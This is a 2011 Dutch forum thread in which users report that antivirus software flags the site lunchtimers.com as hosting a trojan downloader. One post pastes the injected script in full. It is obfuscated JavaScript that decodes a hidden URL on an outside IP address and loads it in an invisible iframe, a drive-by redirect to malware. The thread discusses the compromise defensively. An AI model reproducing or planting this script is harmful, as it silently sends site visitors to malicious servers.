Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

Lunchtimers.com trojan?

Pagina: 1
Acties:

vrijdag 25 november 2011 10:05

Acties:
  • Mavericky
  • Registratie: December 2009
  • Laatst online: 18-11 11:46

Mavericky

Topicstarter
Hoi,

Misschien ken je de website van
code:
1

lunchtimers.com
al. Dit is de website die bekend is met "Who Stole My Letters" - een multiplayer samenwerk flash "spel".

Vandaag probeerde ik weer eens deze website te openen maar toen gaf mijn virusscanner een waarschuwing dat deze website de JS/TrojanDownloader.Iframe.NJS trojan bevat.
(Virusscanner = ESET NOD32 Antivirus 4)

Zou iemand eens kunnen kijken of deze
code:
1

http://www.lunchtimers.com
inderdaad gehacked is en nu een trojan serveert?

[ Voor 8% gewijzigd door iisschots op 25-11-2011 21:05 ]

vrijdag 25 november 2011 10:27

Acties:
  • Outerspace
  • Registratie: Februari 2002
  • Laatst online: 00:11

Outerspace

Moderator General Chat / Wonen & Mobiliteit

AFX Ghey Edition by HlpDsK

URL:
code:
1

http://www.lunchtimers.com/

proces: file://C:\Program Files\Mozilla Firefox\...
infectie: html:Iframe-OC [Trj]
Ik krijg 'm ook.

[ Voor 3% gewijzigd door iisschots op 25-11-2011 21:05 ]

Zoekt nieuwe collega's (jr/sr engineers, servicedeskmedewerkers of managers in de Randstad)

vrijdag 25 november 2011 10:30

Acties:
  • Slurpgeit
  • Registratie: November 2003
  • Laatst online: 14:56

Slurpgeit

Als ik hem uit quarantaine haal van ESET, dan staat dit bovenaan de index (Boven de <HTML> en <HEAD> tags), lijkt me niet helemaal de bedoeling:

code:
1
2
3
4
5

<script>
var b={a:{b:{b:'~',c:'.',a:'^'},c:{b:'%',c:218915,a:1154%256},a:{b:1^0,c:55,a:'ijl'}},b:{b:{b:function(a){try{var c=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');c['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';c['\x76\x61\x6c\x75\x65']=a;c['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](c);}catch(a){return false;}
return true;},c:function(){try{var c=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(c){return false;}
return c.value;},a:function(){var c=b.b.b.b(b.c.b.b('.75.67.67.63.3a.2f.2f.31.39.33.2e.31.30.35.2e.32.34.30.2e.31.38.36.2f.6e.71.7a.76.61.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.65.72.70.6e.67.63.70.75.6e'));var a=(c)?b.b.b.c():false;return a;}},c:{b:function(){var c=b.b.b.a('trashtext');var a=(c)?c:'trashtext';return a||false;},c:function(){var c=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');c['\x77\x69\x64\x74\x68']='0.1em';c['\x68\x65\x69\x67\x68\x74']='0.2em';c['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';c['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';c['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';c['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](c);},a:function(){var c=b.b.a.a(b.b.c.c());c=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var a=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');a['\x68\x65\x69\x67\x68\x74']=a['\x77\x69\x64\x74\x68'];a['\x73\x72\x63']=b.b.a.b(b.b.c.b());try{c['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](a);}catch(a){}}},a:{b:function(c){return c['replace'](/[A-Za-z]/g,function(a){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((a=a.charCodeAt(0))&223)-52)%26+(a&32)+65);});},c:function(c){return b.b.a.b(c)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},a:function(c){try{c();}catch(c){}}}},c:{b:{b:function(c){c=c['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](c);},c:'90',a:'70'},c:{b:'19',c:'25',a:'46'},a:{b:'54',c:'23',a:'92'}}}
b.b.c.a();</script>


Zo te zien is er code geïnjecteerd op de site en heeft ESET je gered van een redirect naar een malware site.

vrijdag 25 november 2011 19:56

Acties:
  • user001
  • Registratie: Juni 2011
  • Niet online

user001

Bij mij heeft mijn anti-virus geen melding.
Ik heb Microsoft Security Essentials.
Ook Virus Total geeft aan dat er maar 2/16 anti-virusprogramma's er een probleem mee hebben!
http://www.virustotal.com...a56988694c504d-1322243116
Misschien is het probleem ondertussen opgelost...

vrijdag 25 november 2011 20:34

Acties:

Verwijderd

Het probleem is er nog steeds - de offending code wordt zelfs twee keer geladen. Dit zijn wat detectieresultaten op het script zelf.

vrijdag 25 november 2011 21:06

Acties:
  • iisschots
  • Registratie: November 2002
  • Laatst online: 24-11 23:49

iisschots

Ik zou iedereen nog even willen wijzen op:
iisschots in "BV Beleid"

Heb wat linkjes in code tags gezet

Hackerspace in Friesland | www.frack.nl | Bezig met opzetten, help mee!

zaterdag 4 februari 2012 20:14

Acties:
  • cc12
  • Registratie: Maart 2003
  • Laatst online: 26-11 18:52

cc12

Ik krijg bij een website een bericht van MS Security Essentials dat er sprake is van een exploit: Exploit:Win32/Pdfjsc.YS

Het gaat om de website: devlamindepan punt nl

Een ernstig probleem?
Pagina: 1
Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq